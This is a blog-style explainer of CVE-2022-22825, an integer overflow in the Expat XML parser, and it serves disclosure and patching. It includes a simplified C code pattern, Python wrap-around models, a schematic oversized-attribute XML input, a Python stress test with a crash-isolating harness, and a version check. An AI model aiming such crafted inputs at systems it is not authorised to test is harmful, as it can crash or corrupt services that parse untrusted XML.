Expat (libexpat) is a widely used C library for parsing XML, embedded across numerous platforms and products. In January 2022, a severe vulnerability tracked as CVE-2022-22825 was disclosed, affecting Expat versions before 2.4.3. This post walks through what happened, how it works (with code snippets), how it could be exploited, and where to find further resources, all in plain terms.
What is CVE-2022-22825?
This vulnerability arises from an integer overflow in the way xmlparse.c within Expat handles certain XML input. If a large enough value is supplied (for instance, via crafted XML), size calculations can wrap around, so less memory is allocated than is actually needed. An attacker may be able to use this to cause out-of-bounds memory writes, leading to application crashes, information leaks, or, in rare cases, remote code execution.
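To make the wrap-around concrete, here is a minimal Python sketch that models 32-bit unsigned multiplication. The 32-bit width, the 8-byte entry size, and the helper name `wrapped_mul` are assumptions chosen for illustration; none of them come from Expat's source.

```python
# Model of C unsigned arithmetic: results are reduced modulo 2**bits.
SIZE_BITS = 32   # assumed width of the size type on the target
ENTRY_SIZE = 8   # hypothetical size of one table entry, in bytes


def wrapped_mul(count, size, bits=SIZE_BITS):
    """Return count * size the way a C unsigned integer of `bits` bits would."""
    return (count * size) & ((1 << bits) - 1)


count = 0x2000_0001                           # 536,870,913 entries requested
true_bytes = count * ENTRY_SIZE               # what the table really needs
alloc_bytes = wrapped_mul(count, ENTRY_SIZE)  # what the allocator would be asked for

print(f"needed:    {true_bytes:,} bytes")
print(f"requested: {alloc_bytes:,} bytes")
```

Under these assumptions the table needs roughly 4 GiB, yet the wrapped request is only 8 bytes, which is the under-allocation described above.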
The Problematic Area: xmlparse.c
The vulnerability lies in the lookup function in xmlparse.c. Here's a simplified view of the problematic code area:
Vulnerable Code Snippet
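/* Simplified illustration of the pattern; not verbatim Expat (<2.4.3) source */
unsigned long totalSize = count * sizeof(ENTRY); /* may wrap for huge counts */
if (count == 0 || totalSize / count != sizeof(ENTRY)) {
  return NULL; /* empty request or overflow detected */
}
TABLE *table = (TABLE *)malloc(totalSize);
if (table == NULL) {
  return NULL; /* allocation failed */
}
/* ...proceed to use table buffer... */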
The check is meant to catch overflow, but it only protects the one multiplication it guards. With very large counts, any size calculation that is left unchecked, or that is performed in a narrower type than the allocation uses, can still wrap.
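A common way to avoid this class of bug is to compare before multiplying, so that no intermediate value can wrap. The sketch below models that idiom in Python; `checked_alloc_size` and the 32-bit `SIZE_MAX_32` are hypothetical names and assumptions for illustration, not Expat's actual fix.

```python
SIZE_MAX_32 = (1 << 32) - 1   # assumed SIZE_MAX on a 32-bit target


def checked_alloc_size(count, entry_size, size_max=SIZE_MAX_32):
    """Return count * entry_size, or None if it would not fit in size_max.

    Mirrors the C idiom `if (count > SIZE_MAX / entry_size) return NULL;`,
    which compares before multiplying so nothing can wrap.
    """
    if count < 0 or entry_size <= 0:
        return None   # reject nonsensical inputs up front
    if count > size_max // entry_size:
        return None   # the product would exceed size_max
    return count * entry_size


print(checked_alloc_size(1024, 8))         # small request: accepted
print(checked_alloc_size(0x2000_0001, 8))  # oversized request: rejected
```

The division happens on the known-small operand, so the guard itself cannot overflow and also avoids dividing by a zero count.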
Exploiting the Integer Overflow
Imagine XML input that drives some internal count, such as the number of distinct attribute names, far higher than expected. If Expat tries to create a hash table that needs, say, billions of entries, the size multiplication can overflow a 32-bit value, so malloc allocates a much smaller chunk of memory than required. Later writes to the table then land outside the allocated region and corrupt memory.
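The growth scenario above can be modelled in a few lines. This sketch assumes a table that doubles to a power-of-two number of pointer-sized slots on a 32-bit target; that is a common hash-table design and a simplification here, not a quote of Expat's code, and all names are hypothetical.

```python
SIZE_BITS = 32   # assumed width of size_t
SLOT_SIZE = 4    # assumed pointer size on the same 32-bit target
MASK = (1 << SIZE_BITS) - 1


def grown_table_bytes(power):
    """Byte size of a table with 2**power slots, as 32-bit C math sees it."""
    slots = (1 << power) & MASK
    return (slots * SLOT_SIZE) & MASK


def first_wrapping_power():
    """Smallest power whose computed byte size differs from the true value."""
    power = 0
    while grown_table_bytes(power) == (1 << power) * SLOT_SIZE:
        power += 1
    return power


p = first_wrapping_power()
print(f"wraps at 2**{p} slots; computed size = {grown_table_bytes(p)} bytes")
```

Under these assumptions the computed size first diverges at 2**30 slots, where the byte count wraps to 0 even though the table would need 4 GiB.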
Test Case: A Crafty XML Attack
Here's a mock exploit scenario. This is only for educational purposes!
Crafty XML Example
<root>
  <!-- schematic only: repeat distinct attributes until allocations grow very large -->
  <el attr0="x" attr1="x" attr2="x" ... />
</root>
By leveraging entity expansion or excessive attributes, an attacker can make Expat try to allocate more memory than it safely can.
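Below is a basic Python test that stresses the parser with a very large attribute count. On a patched Expat it should simply parse; actually reaching the overflow on a vulnerable build would likely take far larger input: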
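import xml.parsers.expat

# Build one element with a large number of distinct attributes
attrs = "".join(f' attr{i}="x"' for i in range(100000))  # try increasing the count
xml_doc = "<root" + attrs + "/>"

try:
    parser = xml.parsers.expat.ParserCreate()
    parser.Parse(xml_doc, True)  # True marks this as the final chunk
    print("Parsed without error")
except xml.parsers.expat.ExpatError as e:
    # Only parser-level errors land here; a native crash cannot be caught
    print("Parser error:", e)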
If the input is large enough to reach the faulty code path in a vulnerable build, the failure happens inside the C library. Python's try/except cannot catch a segfault, so the whole interpreter process would crash rather than print an error.
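Since a native crash takes the whole interpreter down, one option is to run the parse in a child process and inspect its exit status. The sketch below assumes a POSIX system, where `subprocess` reports death by signal as a negative return code; `parse_in_child` and `describe` are hypothetical helper names.

```python
import subprocess
import sys

# Child script: builds an element with many distinct attributes and parses it.
CHILD = r"""
import sys
import xml.parsers.expat

n = int(sys.argv[1])
doc = "<root" + "".join(f' attr{i}="x"' for i in range(n)) + "/>"
xml.parsers.expat.ParserCreate().Parse(doc, True)
"""


def parse_in_child(attr_count, timeout=60):
    """Run the parse in a separate interpreter and return its exit status."""
    result = subprocess.run(
        [sys.executable, "-c", CHILD, str(attr_count)],
        capture_output=True,
        timeout=timeout,
    )
    return result.returncode


def describe(returncode):
    """Turn a subprocess return code into a short human-readable label."""
    if returncode == 0:
        return "parsed cleanly"
    if returncode < 0:
        return f"killed by signal {-returncode}"  # POSIX convention
    return f"exited with status {returncode}"     # e.g. an uncaught exception


print(describe(parse_in_child(1000)))
```

Keeping the risky parse in a separate process means the harness survives and can log the outcome, whatever happens inside the C library.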
Impact and Risk
- Who is at risk? Any application statically or dynamically linking against Expat <2.4.3 and parsing untrusted XML data.
The maintainers patched the overflow in Expat 2.4.3 by improving the integer checks and logic.
Upgrading to Expat 2.4.3 or later is *required*. The fixed code and release notes are listed in the references below.
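For Python users, a quick way to see which Expat the interpreter is using is to read the version exposed by the `xml.parsers.expat` module. This is a minimal sketch; `is_patched` is a hypothetical helper, and the comparison looks only at the reported version number.

```python
from xml.parsers import expat

FIXED = (2, 4, 3)   # first release containing the fix, per the advisory


def is_patched(version=None):
    """True if the (major, minor, micro) tuple is at least 2.4.3."""
    if version is None:
        version = expat.version_info   # Expat version this Python is using
    return tuple(version) >= FIXED


status = "patched" if is_patched() else "VULNERABLE by version number"
print(f"{expat.EXPAT_VERSION}: {status}")
```

A version check is only a first pass: distributions sometimes backport security fixes without changing the upstream version number, so a build reporting an older version may still be patched. Confirm against your vendor's advisory.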
References and Further Reading
- NVD – CVE-2022-22825 Details
- Expat 2.4.3 Release Notes
- Expat GitHub Repo / Fix Pull Request
- Exploit Database – No public exploit (as of posting)
- Official Expat Homepage
Conclusion
CVE-2022-22825 serves as a classic illustration of how old-school problems—like integer overflows—are still dangerous, even in mature and trusted libraries. Always keep your dependencies up-to-date, especially when handling untrusted data (like XML). If you wrap or repackage Expat, verify your version. And remember: small bugs in core libraries can ripple through thousands of products!
Timeline
Published on: 01/10/2022 14:12:00 UTC
Last modified on: 06/14/2022 11:15:00 UTC